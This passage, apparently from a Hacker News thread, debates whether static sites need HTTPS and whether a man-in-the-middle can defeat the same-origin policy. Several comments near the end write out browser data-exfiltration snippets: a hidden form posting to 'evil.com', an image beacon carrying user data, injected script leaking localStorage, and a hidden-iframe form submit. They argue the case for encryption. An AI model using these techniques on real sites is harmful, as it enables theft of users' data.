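    "index.html": hashlib.sha256(b"<html>hello</html>").hexdigest(),
}

def verify(name: str, data: bytes) -> bool:
    """Accept the file only if its SHA-256 digest matches the manifest."""
    expected = MANIFEST.get(name)
    return expected is not None and hashlib.sha256(data).hexdigest() == expected
```

Note this gives integrity only: anyone on the path can still read what was fetched, which is exactly the trade-off the parent comment describes.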


You could securely sign the data in a tamper resistant way. Although that would be at least as disruptive to http as https is. And it also can't obscure the specific pages you're visiting.


Cryptographic verification?


Sure, but that would still leave the data open to the world. Not an alternative to TLS.


Most of the content on the web is intentionally open to the world.


But our personal data is not. So much data is potentially made available from an unencrypted HTTP request.


Nobody is saying that personal data should be unencrypted.


the post is good.. but also: confidentiality matters.

Think about a library. There are no secrets in the stacks that need to be kept from public disclosure. What is secret is the act of using the library - i.e. what they choose to read.


A big reason is that Chrome (and others?) specifically show 'Not Secure' for all sites not using https.


This is a massive reason, imo. The average user views that url annotation as a bad thing. They don't know it's static, or even what "static" refers to.


Even if they knew the site was static, "not secure" would still be valid. An ISP or malicious wifi network may be recording their browsing history, downsampling images, injecting or replacing ads, replacing executables with backdoored versions, adding fake login forms or popups to get the user to give a password of theirs, etc.


Actually, one service that DNS providers should offer is generating and renewing Let's Encrypt wildcard certificates automatically, and offering their clients to download them through some API. That would make life a lot easier for less technical devs who are intimidated by the complexity of PKI.
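The DNS-01 challenge that wildcard issuance relies on is mechanically simple, which is what would make this automatable. A sketch of how the TXT record value is derived per the ACME scheme (RFC 8555); the token and thumbprint below are made-up placeholders, since real ones come from the ACME server and account key:

```python
import base64
import hashlib

def b64url(data: bytes) -> str:
    # Base64url without padding, as ACME requires
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def dns01_txt_value(token: str, account_thumbprint: str) -> str:
    """Value to publish at _acme-challenge.<domain> for a DNS-01 challenge."""
    key_authorization = f"{token}.{account_thumbprint}"
    return b64url(hashlib.sha256(key_authorization.encode("ascii")).digest())

# Placeholder inputs for illustration only
txt = dns01_txt_value("some-token", "some-account-thumbprint")
```

A DNS provider already controls the zone, so it could publish this record and complete the challenge with no work on the customer's side.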


Github pages supports TLS even for custom domains now, via Let's Encrypt. At this point, I don't think there's any excuse anymore for having a static website without TLS. Either use Github pages, or just use your favorite hosting provider and put a CDN in front of it.

Note: I'm not affiliated with Github, but I've used them multiple times, and just recently discovered they now support TLS. If you want to see an example: https://solokeys.com is hosted on Github pages.


As far as I know Github is the _only_ static site provider that will do this for you.

I’m scratching my head trying to figure out the best way to do automated certificate renewal for other providers. It’s not like you can run certbot on a static page.


> As far as I know Github is the _only_ static site provider that will do this for you.

Netlify automatically does this [1], and Zeit's Now too, I think [2].

[1] https://www.netlify.com/docs/ssl/

[2] https://zeit.co/docs/examples/static


What if your website is only accessible to you from within your LAN? Such as your router, NAS, or set-top box? If you have DHCP as well and don't control the DNS or don't have root (such as on IoT devices), then you cannot use Let's Encrypt. Or am I missing something?


I used to have a $75 Netgear router at my house. I changed the local DHCP settings to hand out a Raspberry Pi's internal IP as the DNS server. I run dnsmasq on the Pi and resolve local hosts that way. Every internal service in my house uses HTTPS, and I have about a dozen.
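A setup like that can be just a few lines of dnsmasq config (names and addresses below are examples):

```
# /etc/dnsmasq.conf on the Pi
# Resolve internal hosts locally...
address=/router.home.example.net/192.168.1.1
address=/nas.home.example.net/192.168.1.20
# ...and forward everything else to an upstream resolver
server=1.1.1.1
```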


Sorry this is a day late, but how do you get certificates for internal services? Do you manually trust them on each client? Or do you have a wildcard cert from a public server? Is there some cleaner way to manage internal HTTPS?


I resolve internal services as subdomains of a domain I own. I use a wildcard cert I get issued on an EC2 instance. I script an sftp upload of the new cert every renewal to my main internal machine, where it is shared via NFS. This is the simplest way I've found.
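A sketch of that distribution step in Python (paths and file names are assumptions; the sftp transport from the comment is replaced by a plain copy for illustration):

```python
import os
import shutil
import stat

def distribute_cert(lineage_dir: str, dest_dir: str) -> None:
    """Copy a renewed cert and key out of certbot's lineage directory
    so other internal machines can pick them up (e.g. over NFS)."""
    os.makedirs(dest_dir, exist_ok=True)
    for name in ("fullchain.pem", "privkey.pem"):
        dst = shutil.copy(os.path.join(lineage_dir, name), dest_dir)
        if name == "privkey.pem":
            # The private key should stay readable by the owner only
            os.chmod(dst, stat.S_IRUSR | stat.S_IWUSR)
```

Hooking something like this into the renewal run (certbot supports deploy hooks) means the copy happens only when a cert actually changed.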


I feel like this article has been posted a dozen times already, but the "past" link is showing this as the only submission.

EDIT: Nevermind, I'm confusing it with similar discussions:

https://news.ycombinator.com/item?id=17651652

https://news.ycombinator.com/item?id=17599022

https://news.ycombinator.com/item?id=17605973


There is one static webpage that I won't put HTTPS on; the dashboard of my pi.hole.

Though it's more of an architectural decision as it enables the DNS server to blackhole HTTPS more effectively (since it just gets a CONNREFUSED back).

Really, it's an exception to the rule and only because I can't ask my guests to install my pihole CA on their devices (many of which don't support that stuff anyway).

Well and there is that other website but the prime directive forbids that I mention it...


You can buy a domain name and do DNS auth. Requires no open ports and you'll get a trusted cert for that one Pi. I did it for mine (but with SNI verification).


Pi.hole, it's only local and there is a reason it doesn't open port 443 and only works on 80. On a local non-wireless LAN this is not a concern in my threatmodel.


The drawback of using https everywhere is that a big company can't locally cache things that get downloaded again and again from the network, like OS and application updates, videos on the web, and so on.

I think that we need an alternative to https: a protocol that guarantees only authentication (sign the packets, basically) and doesn't encrypt content. You can verify that what you get is what the website owner intended (no MITM) and you can have a cache.


I went there to see why and the only subhead I understood without searching was "HTTPS is easy". I gather, only HTTPS is easy nowadays :)


Not security related, but for SEO, having HTTPS means Google will treat your website with more mercy in the storm of search results.


How can I go about securing a server without a domain? Just a static IP? Let's Encrypt doesn't allow IPs and the owner doesn't care for a domain.

Context: small business with a web based application in a local server, all they need is to be able to access reports from their phone.


Self-signed certificate (or own CA and certificate signed by that). Buying a certificate for an IP is more expensive than a domain.


I've tried self-signed certificate somewhere else but it seems Chrome doesn't add the certificate permanently so every few days they get the "scary" not secure window again.

I'll try with my own CA.


Can I suggest registering a domain for $1, pointing that at the IP and using LetsEncrypt? Probably less effort in the long run.


Trusted certificate authorities do not issue DV SSL certificates (with domain validation) for IP addresses, because it creates certain security threats.


I think that the argument that you can't trust ISPs is weak. With HTTPS, you still need to trust certificate authorities. It is somewhat suspicious that Google suddenly decided to create their own Certificate Authority in 2017. Forcing every website to use HTTPS just reduces the pool of entities who are able to track and manipulate us, and it gives a false sense of security.

There is no doubt that this change is designed to take power away from some entities and to put it in the hands of a few key players which Google trusts.

Also, the video created by the author is highly deceptive; the author makes it look like he has hacked the website itself; in reality, he has only intercepted the traffic to his own machine so in reality he has only modified his own view of the website; he hasn't actually hacked anything. I'm sure that the author is being intentionally deceptive; he knows exactly who the target audience for that video is and he knows exactly what it looks like.


Certificate authorities that participate in Certificate Transparency are forced to publish all certificates they issue, so site owners can tell if a fraudulent certificate for their own domain is ever generated. I think browsers are pushing for all CAs to adopt Certificate Transparency. This greatly reduces the power of malicious CAs.


The web was supposed to be open and free; it was supposed to democratize the exchange of information. We have lost control of it by allowing corporations to subvert that idea.

Frightening stupid people by exaggerating threats that they don't fully understand is what corporations do to sell their products and services.

Using a browser underwritten by a large corporation is a very bad idea. When it pops up a message saying that a static website is insecure, it's time to get another browser.


All websites need onion/i2p addresses, not HTTPS.


chrome://flags

Mark non-secure origins as non-secure

Disabled


People here are bringing up the difficulty for a regular user to set up HTTPS.

I want to go one further: WHY does a regular user need to buy a human-readable domain name, maintain it, and pay for a hosting company to host on that domain?

It used to be worse - you had to have your own machine or use some crappy shared hosting service. Amazon figured out that letting people share managed virtual machine instances was good savings. That’s now called “the cloud” but it’s still under the control of some landlord - Amazon, DigitalOcean, etc.

Let’s face it, the easiest thing we have today is some web based control panel by CPanel running on some host that charges $5/month or something.

It’s 2018. Why don’t we have something like MaidSAFE and Dat working yet? We should have:

  1) End to end encryption

  2) One giant, actually decentralized cloud composed of all nodes running the software

  3) Storing chunks of encrypted data using Kademlia DHT or similar

  4) Maybe even periodic churn on the back-end so you can’t find and collude with the servers hosting the chunks

  5) All underlying URLs would be non-human-readable and clients would display (possibly outdated) metadata like an icon and title (this metadata may change on the Web anyway). Storing and sharing could occur using QR codes, NFC bluetooth, Javascript variables, or anything else. For static files, the links could be content-addressable.

  6) All apps and data would be stored encrypted in the cloud and only decrypted at the edges. They would run on the clients only. Apps could also be distributed outside the cloud, but usually just via a link to a cloud URL.

  7) Communities would likewise be just regular users, rather than private enterprises running on privileged servers running some software like github is now. No more server side SaaS selling your data or epic hacks and breaches. 

  8) Users would have private/public key pairs to auth with each community or friend. They would verify those relationships on side channels for extra security if needed (eg meet in person or deliver a code over SMS or phone). Identity and friend discovery across domains would be totally up to the user.

  9) Private keys would never leave devices and encryption keys would be rotated if a device is reported stolen by M of N of other devices.

  10) Push notifications would be done by shifting nodes at the edges, rather than by a centralized service like Apple or Google. In exchange for convenience, they can expose a user to surveillance and timing attacks.
No more waiting endlessly to be “online” in order to work in a SaaS document. The default for most apps is to work offline and sync with others later.

No central authorities, CAs or any crap like that. Everything is peer to peer. The only “downside” is the inability to type in a URL. Instead, you can use one or more indexes (read: search engines) some of which will let you type existing URLs, or something far more user friendly than that, to get to resources.
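The content-addressable links from point 5 could be sketched like this (the "blob://" scheme is made up for illustration):

```python
import base64
import hashlib

def content_address(data: bytes) -> str:
    """Derive a stable, non-human-readable link from the content itself."""
    digest = hashlib.sha256(data).digest()
    return "blob://" + base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")

# The same bytes yield the same address no matter which node serves them,
# so any peer can vouch for the content without a central authority.
addr = content_address(b"hello, decentralized web")
```

Because the address commits to the bytes, a client can fetch from any untrusted peer and verify locally, which is what removes the need for CAs for static content.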

Domains and encryption key generation would be so cheap that anyone can have a domain for a community of any kind, or even just for collaborating on a document.

There will no longer be a NEED for coupling domains to specific hardware somewhere, and third-party private ownership/stewardship of user-submitted content would be far less of a foregone conclusion, fixing the power imbalance we have with the feudal lords on the Internet today.

Once built, this can easily support any applications from cryptocurrency to any group activities, media, resources etc.

If you are intrigued by this architecture, and want to learn more or possibly get involved, contact greg+qbix followed by @ qbix.com - we are BUILDING IT!


> I want to go one further: WHY does a regular user need to buy a human-readable domain name, maintain it, and pay for a hosting company to host on that domain?

Because there's no interest in that. Getting a domain name is already cheap and easy.

> Storing chunks of encrypted data using Kademlia DHT or similar [...]

I've yet to see any P2P system have low latency, high speed and high reliability.

> All underlying URLs would be non-human-readable and clients would display (possibly outdated) metadata like an icon and title (this metadata may change on the Web anyway). Storing and sharing could occur using QR codes, NFC bluetooth, Javascript variables, or anything else. For static files, the links could be content-addressable.

Why?

> The only “downside” is the inability to type in a URL.

Good luck saying to your friend the nice webstore you got your hoodie from is [insert non-readable non-pronounceable url].

> and third party private ownership/stewardship of user-submitted content would be far less of a foregone conclusion

This is unacceptable for law enforcement

> If you are intrigued by this architecture, and want to learn more or possibly get involved, contact greg+qbix followed by @ qbix.com - we are BUILDING IT!

Oh this is an ad...


I'm not trying to advertise, but Beaker browser does a real good job of making p2p delivery transparent to the end user. It's probably slower than most sites in normal usage, but certainly acceptable speeds for static sites, and it performs better under the hug-of-death a site gets when posted on Hacker News. :)

Plus, it already has existing methods to map DNS records or servers to the p2p records, so I can access dat://beakerbrowser.com/ or dat://epa.hashbase.io/ and get it served across the p2p network or pull it up offline if I've viewed it before.


> The only “downside” is the inability to type in a URL.

This is not tenable. You have to solve Zooko's Triangle or no one will use your thing. That's the existing problem with Dat, which otherwise works wonderfully.


Why do you want to type in URLs? It’s like the command line before it was replaced by GUIs for the majority of people who are non technical.


Because people don't just send URLs around online? If you tell people your site address in person/by phone/in a non tech context, they need to be able to type it in easily enough.


So you can just have your company’s NAME on Google let’s say. Many people actually type stuff into Google instead of the address bar. They don’t even know the difference!

And honestly, I know what it is like to dictate a phone number or name over the phone. You have to spell it out, then they say it back to you. They say “C like Charlie”. Seriously? And you’re saying people will WANT to preserve this crap?

No way. People will be very happy to get rid of dictating stuff on the phone. How about AT LEAST copypasting into a text? Using words to dictate an address or phone number requires error correction and super slow annoying transmission.

And if you DO tell people something, it is usually typed into a search engine. What if I want to share a URL that’s more complex than “nytimes.com”? What if I want to share an article on NYTimes? HAVE YOU EVER DICTATED THAT TO SOMEONE? So come on. The most you can comfortably do via manually typing what you heard into an address bar is to go to the front page of a website. That’s a tiny subset of the URLs.


I admin a number of different websites. The majority of them are static. I have forced https redirect on some of them. On others I do not.

The only benefit of https I perceive in the case of static public content is that ISPs cannot easily monitor which specific pages on my domains are being visited. With plain http they could.

I don't particularly care if people get MITM'ed when visiting my static sites. If they did so it generally is because they chose to use unsafe public access points ( wifi ). This extends to some degree to all forms of wifi since so many security forms in use on them can be easily broken.

My current understanding is that enterprise encryption using certs with wifi is still secure and cannot currently be broken.

The only other party who could do MITM against normal customers on their own home internet, while using wired connections, is, I believe, the ISP themselves. Random third parties cannot generally do so. If there is some plausible way they can, I would like to hear it.

If your ISP is MITMing you, I think you have bigger problems than whether they change the content of my static site when you visit it. If they were, they could potentially target your initial download of your browser and downgrade to http to infect your browser, so that you never realize afterwards that https is faked out...

I think there are caching benefits to using plain http. The primary one is so that your ISP can cache your static content and save internet bandwidth globally.


> generally is because they chose to use unsafe public access points

It sounds like you are penalizing users for not using a vpn or some other method when out of their homes. Yes, people can do that, but in 2018 having https on the sites you manage is a lot easier than asking every possible visitor to use a vpn. I hope you would reconsider and enable https on all the sites you are an admin.

> If your ISP is MITMing you, I think you have bigger problems than whether they change the content of my static site when you visit it. If they were, they could potentially target your initial download of your browser and downgrade to http to infect your browser so that you never realize after that that https is faked out...

They could, and maybe in countries other than the US you have plenty of ISP choices, but in many places in the US, you are stuck with just one ISP.

And so far, we know that ISPs are manipulating http traffic but so far they haven't gone all the way to give you an infected browser. Again, it is possible, but I think that a better approach is if we all do as much as we can to help each other, the internet could be a better place.


It's all good to point this out, but it's a social argument, not a technical one. If the technical arguments have been eliminated (e.g. you have no technical use for encrypting the connection) then you're left with "Join us in giving the finger to ISPs/cafe routers that inject foreign JS!" Don't be upset when people say "Meh. Take it up with those ISPs directly, or with web browser vendors, I don't care and don't want to join your crusade." At some point web browsers will stop serving content over HTTP unless perhaps with a custom flag turned on, and even then, some people will still not use HTTPS.


> I don't particularly care if people get MITM'ed when visiting my static sites. If they did so it generally is because they chose to use unsafe public access points ( wifi ). This extends to some degree to all forms of wifi since so many security forms in use on them can be easily broken.

While wifi offers little "complete" security, some methods of security, (like implementing HTTPS) require very little work for a relatively large decrease in attack surface


Also, remember that people who get MITMed are not going to say "Oh, sucks to be me for using insecure public wifi and getting pwned when visiting nanoscopic.io, I'm such an idiot..." - they're going to say "The shit-weasel who runs nanoscopic.io installed a fucking cryptominer and configured porn ad dns servers on my laptop! Don't _ever_ visit that site!"

The "very little work" required to use https these days could one day be incredibly valuable in terms of not having your reputation trashed... Perhaps you _should_ care a little more about people getting MITMed...


There are other threat vectors you aren't considering such as DNS cache poisoning, [BGP hijacking][1], and [rogue USB sticks][2].

But even ignoring that, why wouldn't you want to take basic steps to protect against rogue access points or ISPs? "I don't particularly care if people get MITM'ed when visiting my static sites" seems, at least to me, like a rather dismissive attitude towards the security of your site's users.

I'd also like to point out that with the ever-widening deployment of HTTPS, the hypothetical attack you described where your ISP MITMs your browser install is becoming less and less feasible. Nearly all modern browsers include a [HSTS preload list][3] which ensures they will never attempt to connect to certain domains over an insecure connection. A browser download site (or even just the user's search engine, which would link directly to the HTTPS-protected download page) being on this list would make the downgrade attack you describe much more difficult.

[1]: https://www.internetsociety.org/blog/2018/04/amazons-route-5...

[2]: https://samy.pl/poisontap/

[3]: https://scotthelme.co.uk/hsts-preloading/


Rogers Cable is one of the few major ISPs in Canada and they used to (maybe still do? I moved away years ago) modify your page content to include data overage warnings or past due balance warnings at the top of pages you visited.

HTTPS everything please.


One benefit of HTTPS is that ISPs can't insert their ads onto your website. Believe me, there are ISPs that do that.

> If your ISP is MITMing you, I think you have bigger problems than whether they change the content of my static site when you visit it.

Perhaps. But in the UK ISPs are legally required to log every web page you visit. However, they are not going to serve you a fake version of Chrome (which is signed anyway).


>I don't particularly care if people get MITM'ed when visiting my static sites.

I for one would be honored, and then irritated.


> The only benefit of https I perceive in the case of static public content is that ISPs cannot easily monitor which specific pages on my domains are being visited

What about HTTP2?


I don't particularly care if people get MITM'ed when visiting my static sites.


Here's the truth about security: people are clueless about it and so corporations and governments abuse that by pushing their own agendas, not related to security.

Same corporations that tell you to "secure" your unimportant static website with https also want to force you to run random javascript in your browser from unknown parties, identify you at all times, link everything to your phone number, etc. In the end we are all going to be worse off with this let's encrypted web, with more control than ever in the hands of those few US corporations.


How are those related? Letsencrypt doesn't try to identify anyone, and certainly doesn't run JavaScript on your site.


I wonder what would happen if Let's Encrypt started charging for their service AFTER HTTPS became compulsory. Seems like a great (but evil) business strategy. All these CAs could just start increasing their prices and we'd all be forced to pay.

If you understand human behavior, then you know that this WILL happen eventually.


This might even make sense as "a great (but evil) business strategy" except Let's Encrypt isn't a business, it's provided by a charity, ISRG, the Internet Security Research Group, set up for exactly this purpose by people from Mozilla (a charity) and the EFF (another charity)

I suspect that the people behind ISRG weren't as paranoid as the Free Software Foundation about being corrupted by some hypothetical evildoers (the FSF has a whole mechanism to try to ensure that if you somehow take over the Foundation you can't use its resources to counter its original purpose) but you're going to need a bit more than a vague idea that people are capable of evil as an explanation for why good things are actually not good.


I don't know who has what legal remedies when a nonprofit acts inappropriately, but another observation is that most of Let's Encrypt's technology is developed in public.

https://github.com/letsencrypt

If you needed to set up another ACME-compatible CA on the same model (which could then be a drop-in replacement compatible with the existing client base), it would be a lot less expensive (although it would require datacenter build-out, hiring an operations team, and a variety of PKI-specific stuff like key ceremonies, HSMs, cross-signing, CPS, and audits).


I would think that there are enough competing vendors, and they are sufficiently interchangeable, that one vendor having low prices will drag the whole market down. That is, I believe that CAs are actually a nearly efficient market.


What are you talking about?


Don't forget the other elephant in the room: certificate revocation.

If your site isn't using HTTPS it will always be "not secure", but always accessible.

If it is, then it's accessible until someone decides to revoke your certificate for whatever reason.

The old quote is relevant again: "Those who give up freedom for security deserve neither."


Why wouldn't you? It took me 30 mins to read and set up a cert from let's encrypt.


Don't underestimate the weight of a decision, the effort of even knowing a choice exists, or the care it takes to act on it.

Also, see how often humans don't change from default settings -- ringtones, bootstrap themes, etc..


I have recently adopted HTTPS on my own site, because there are substantial performance benefits with HTTP/2 that are only available over HTTPS.

There are many arguments in the article, and more that he links to, arguing for the security benefits of HTTPS. HTTPS is good for protecting content.

One very serious argument that HTTPS evangelists avoid is that when there is no content to protect, the security benefits of HTTPS evaporate. My site is a web application that stores all user data in their browser. Their data does not come back to the server. The only thing that crosses the wire is a request for the application code and a response with that code.

I would argue this model of application is substantially more secure than sending data across the wire regardless of whether that transmission is encrypted. There is nothing individually identifiable or preferential about the application code. The content, identifiable information, and personal/private details remain with the user where they reside anyways.

---

EDIT

Before everybody jumps on the MITM attack bandwagon be aware of https://en.wikipedia.org/wiki/Same-origin_policy

A man in the middle attack can void the integrity of data crossing the wire, but it cannot trivially break privacy with simple modifications to code. This is by design in the architecture of the web.

The only violation in question is code integrity (the integrity portion of the security CIA triad). Fortunately, this is a solved problem so long as the application is open source. If an integrity violation occurs that renders the application defective, simply compare the transmitted application code against the stored publicly available application code. This is made easier when the application in question is a diff tool that can fetch code from across the wire.


> One very serious argument that HTTPS evangelists avoid is when there is no content to protect the security benefits of HTTPS evaporate. My site is a web application that stores all user data in their browser. Their data does not come back to the server. The only thing that crosses the wire is a request for the application code and a response with that code. I would argue this model of application is substantially more secure that sending data across the wire regardless of whether that transmission is encrypted.

That's a case where HTTPS really is essential! If you serve your application code over HTTP, then I can MiTM that connection and replace your application code with something that reads all the user data from the user's browser and then sends it to evil.com.


You can implement authentication without encryption.

Also, who says that HTTP content is always plaintext?


> and then sends it to evil.com.

How would a man in the middle attack grant you that? This is the reason same origin policy exists. It is the foundation of web security. If you can break SOP and prove it in a demonstration, you can report this issue to Google as a defect in the top tier of their bug bounty for a sizable reward.


Without SSL, I can inject code directly into the main HTML, in the same origin context as yours.


Yes, but the comment I replied to mentioned sending compromised data to a browser and then sending user data from the browser to an untrusted third party. The browser will not typically allow that due to same origin policy and certainly not if content security policy is applied.


You keep saying the thing about same-origin; I wonder how you think Google Analytics and similar services work, if sites can't send data to external services.

CSP headers won't ever reach the browser if the attacker has MITM, so they are irrelevant.


They work the same way in HTTPS as they do in HTTP. Same origin applies to the domain of asset reference. If you have CSP in place you must specify an exception for GA or it won't work.

If the attacker has MITM capabilities they can redirect the page to an untrusted location and bypass the valid server completely. MITM isn't typically limited to layer 7 unless the goal is to stand in the encrypted tunnel.



If evil.com serves the proper CORS headers, then any site is allowed to make AJAX calls to it.

Also, the attacker could inject <img> tags with a src attribute pointing to "https://evil.com?userdata=...".

Also, if the attacker is already man-in-the-middle attacking yoursite.com, they could make the site's code make ajax calls to "yoursite.com/nothing-to-see-here". Users looking at the network requests may not notice anything is going on.
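To make that last point concrete, here's a sketch of the URL injected code could build and fire (the path "/nothing-to-see-here" is from the text above; the data object is a stand-in for whatever the page keeps in localStorage):

```javascript
// Build an exfiltration URL on the page's OWN origin; SOP permits this,
// and the MITM sees the request on its way through.
const stolen = { user: "alice", token: "abc123" }; // stand-in for localStorage
const exfilUrl =
  "/nothing-to-see-here?d=" + encodeURIComponent(JSON.stringify(stolen));
// In a browser the attacker would fire this with fetch(exfilUrl) or an <img>.
console.log(exfilUrl);
```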


CORS requires an HTTP header whitelisting allowed domains. If the attacker can modify the HTTP headers they don't need to modify the HTTP body in order to perform an attack.

> Also, the attacker could inject <img> tags

First, the image needs to be requested using the same protocol that requested the page or it will notify the user of insecure assets. Second, they would have to write a custom script to gather the data to append as the URI query string. Third, the image would need to be injected after the user has manually entered information to the site, which eliminates static images in the HTML source. Fourth, actually test this. When I test it I get a CORS error in the browser. Strangely, Chrome reports this as a warning instead of as an error, but the request is blocked and it never leaves the browser.

> Also, if the attacker is already man-in-the-middle attacking yoursite.com, they could make the site's code make ajax calls to

No, that is not allowed by the browser and will throw an error. It violates same origin policy. If you can figure out how to break same origin policy Google will pay you $5000 for reporting a significant issue to their bug bounty.


>CORS requires an HTTP header white listing allowed domains. If the attacker can modify the HTTP headers they don't need to modify the HTTP body in order to perform an attack.

The attacker owns evil.com. They can make it have any headers they want, and then javascript on yoursite.com or any other site is allowed to make ajax requests to it. (Of course, they'd still need to do a man-in-the-middle attack on yoursite.com to modify yoursite.com's javascript. They technically don't need to involve evil.com if they're MITMing yoursite.com as I mentioned at the end of my post above, but it is a technically possible thing for them to do.)

> First, the image needs to be requested using the same protocol that requested the page or it will notify the user of insecure assets.

The attacker can make evil.com use HTTPS if they need to. There's no restrictions stopping attackers from getting certificates for their own domains. HTTPS doesn't signify that the owner of the domain is trustworthy; it just signifies that the contents you receive from a URL weren't MITMed.

> Fourth, actually test this. When I test it I get a CORS error in the browser. Strangely, Chrome reports this as a warning instead of as an error, but the request is blocked and it never leaves the browser.

Did you test this on HN? HN uses an unusually restrictive Content-Security-Policy header to restrict where assets can be loaded from. It is a protection against this sort of attack, but only a weak one against a determined attacker who can manipulate page javascript or html: An attacker could make every element on the page be a link to evil.com?userdata=..., which a lot of users will probably click. The user might realize something is up, but the attacker has already gotten their data so it's a bad consolation prize. Also, in the specific case of MITM attacks, CSP is no help since an attacker can just strip the header off.

>No, that is not allowed by the browser and will throw an error. It violates same origin policy. If you can figure out how to break same origin policy Google will pay you $5000 for reporting a significant issue to their bug bounty.

(I don't mean to brag, but just to point out a possibly relevant credential: I have gotten a 4-digit bug bounty payment from Google before.)

If an attacker MITMs yoursite.com and modifies the javascript served by yoursite.com, then when a user navigates to yoursite.com, that javascript is allowed to connect to yoursite.com (or any domain that is served with CORS headers). The same origin policy is about preventing a domain from accessing domains that don't want to be accessed; it is not about preventing a domain from talking to anyone at all including itself. (Content-Security-Policy does focus on that, but it can be difficult to make bulletproof and should be treated as a defense-in-depth, and it's not relevant to MITM attacks at all since a MITM can just strip it.)


> The attacker owns evil.com. They can make it have any headers they want, and then javascript on yoursite.com or any other site is allowed to make ajax requests to it.

Only if the page is originally requested from evil.com or if evil.com is listed in the CORS http header from the legitimate domain.

In order for this attack to work evil.com needs to be added to the CORS list in the http header and JavaScript needs to be inserted into the page body to make XHR calls to the evil.com domain.

> Did you test this on HN?

I tested it on a couple of sites both with http and https. It is not a valid vector of attack. Don't take my word for it. Try it.

---

All these technical conversations are really a red herring based upon the untested assumption that modification of page traffic is trivial if the page is served over HTTP. While this is possible it isn't trivial and requires multiple stages of compromise.

Typically man in the middle attacks refer to encrypted traffic, such as HTTPS, instead of plain text traffic. The benefit of a man in the middle attack is that the attacker is in the encrypted tunnel between the two end points reading data that is otherwise encrypted and thereby voiding any benefit of encryption.

Modifying traffic is less trivial than reading traffic. It is certainly less valuable when there are security conventions in place to ensure end point authenticity, as in limited to only locations that are available by address and policy.

> I don't mean to brag, but just to point out a possibly relevant credential:

Don't care. I myself have found and reported a critical flaw in V8 that broke recursive function access under certain conditions. I don't remember when the resolution was released to V8, but it was first available to Node with 4.2.4 on 2015-12-23. All prior versions of V8 were impacted.

> If an attacker MITMs yoursite.com and modifies the javascript

And how would you do that? I have not seen anybody prove they can both MiTM a production site and modify the data in a way that breaks same origin policy, yet everybody says it's trivial. If you really want to brag and get another 4 digit bug bounty then prove that.


> if evil.com is listed in the CORS http header from the legitimate domain.

That's not how CORS works; the header is read from the domain being called from JavaScript, not from the domain where the JavaScript came from. So in this case, the injected JS will call evil.com, and so the CORS headers will be read from evil.com.


>Only if the page is originally requested from evil.com or if evil.com is listed in the CORS http header from the legitimate domain.

You have CORS backwards. Domains give other domains permissions to access them in CORS. I think you're thinking of Content-Security-Policy here (which lets a domain specify other domains that may be interacted with from the domain), but I've already mentioned a number of issues with it (the first being that a MITM can just remove that header).

>I tested it on a couple of sites both with http and https. It is not a valid vector of attack. Don't take my word for it. Try it.

If you open example.com and run this in the console:

    (new Image).src = 'https://news.ycombinator.com/y18.gif?userdata=123'
then an HTTP(S) request is triggered. The operator of that domain's server can see a request happened and see the userdata parameter. (If you do it with a URL that doesn't respond with an image, then you may see a warning in the console like "Cross-Origin Read Blocking (CORB) blocked cross-origin response ...", but that warning only means that example.com doesn't get to read the response. The request still happened and the attacker already leaked the userdata.)

>All these technical conversations are really a red herring based upon the untested assumption that modification of page traffic is trivial if the page is served over HTTP. While this is possible it isn't trivial and requires multiple stages of compromise.

If the attacker is the ISP, or controls a wifi router that victims are using, then it's trivial[0].

>Typically man in the middle attacks refer to encrypted traffic, such as HTTPS, instead of plain text traffic.

Wasn't this entire comment chain started from you saying that HTTPS was unnecessary in some certain situation? Everyone is responding to you about attacks that are possible if you decide not to use HTTPS. I think we've lost the plot if you're going to interpret these attacks as if your site is using HTTPS.

> And how would you do that? I have not seen anybody prove they can both MiTM a production site and modify the data in a way that breaks same origin policy

Easy: run a public wireless router (or run an ISP) that people use to connect to HTTP sites. If you want, you can append some code to any javascript file coming through to POST the contents of localStorage (and indexeddb, etc) to a page on the same domain (and that request will go through you, so you see the data). You filter out any Content-Security-Policy headers that might restrict the page from making ajax connections to itself. There's only one domain involved, so same origin policy doesn't affect anything at all in this situation.

[0] http://www.ex-parrot.com/pete/upside-down-ternet.html
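The "append some code" step is mechanically trivial; a sketch of what the on-path box does to each plain-HTTP HTML response (payload and names are illustrative, not from any real tool):

```javascript
// Inject an attacker script into any unencrypted HTML response in transit.
const payload = "<script>/* POST localStorage back to this same origin */</script>";

function inject(html) {
  // A real middlebox would also strip any Content-Security-Policy header.
  return html.replace("</body>", payload + "</body>");
}

const page = "<html><body><h1>Your static site</h1></body></html>";
console.log(inject(page));
```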


There are enough "gaps" in the SOP that you can trivially move data cross-origin: most obviously <form action="https://evil.com/" method="post" id="dummy"><input type="hidden" value="my-data"></form><script>window.dummy.submit();</script>.

In general terms, you can often write cross-origin, but you can't read.


A form submission would refresh the page to the evil domain. It would change the domain in the address of the page. This same vector of attack can still occur with HTTPS so long as the malicious code is injected from an XSS or CSRF attack.

The page address is the web's equivalent of physical security. If you cannot trust that there is no security.


Put it in an iframe, then. No URL change, no page change.

In any case, once the page has changed the URL visible to the user it's already too late. Their data is sent. I guess it's nice that they are informed that something happened but not really. And that unknown server could easily redirect the user straight back to the site they were on, so the user would only see a flash on their screen.


How would that help? See this: https://news.ycombinator.com/item?id=17861667


And even more stealthily, an iframe with display: none.


> A form submission would refresh the page to the evil domain.

The server at evil.com can just reply with a redirect and it's likely that the address bar will not even show that it was at evil.com at some point. It will probably show "Connecting to evil.com..." or "Transferring data to evil.com..." at some point depending on how much data there is to transfer. But it would likely not be good.com vs. evil.com, it would be good.com vs. good.com.services.co.


The iframe is still limited by same origin. The browser won't let you cross the frame's border if the domains are different. There is no attack there.


In the form case that's easy:

  <script>
  var f = document.createElement("iframe");
  f.style.display = "none";
  document.body.appendChild(f);
  // note that the iframe has now synchronously loaded about:blank,
  // which is treated as same-origin
  var f_doc = f.contentDocument;
  f_doc.innerHTML = "<form…></form>";
  f_doc.querySelector("form").submit();
  f_doc = null; // allow the old document to be GC'd
  </script>

The fact the iframe navigates to a cross-origin page (and f.contentDocument will then be null) is irrelevant, because the data loss has already happened.


Did you try that code? I tried it in the browser console on this very page and it throws a security error in Firefox. It throws a null error in Chrome, so I modified the code so that the form actually has a method and an action, but it still fails. Chrome throws valid error messaging if the iframe action is not https but the actual page is. Otherwise Chrome still throws an error, but the response is not intelligible if the domain has no HTTP content security header. If the site has a content security header then the error message is valid:

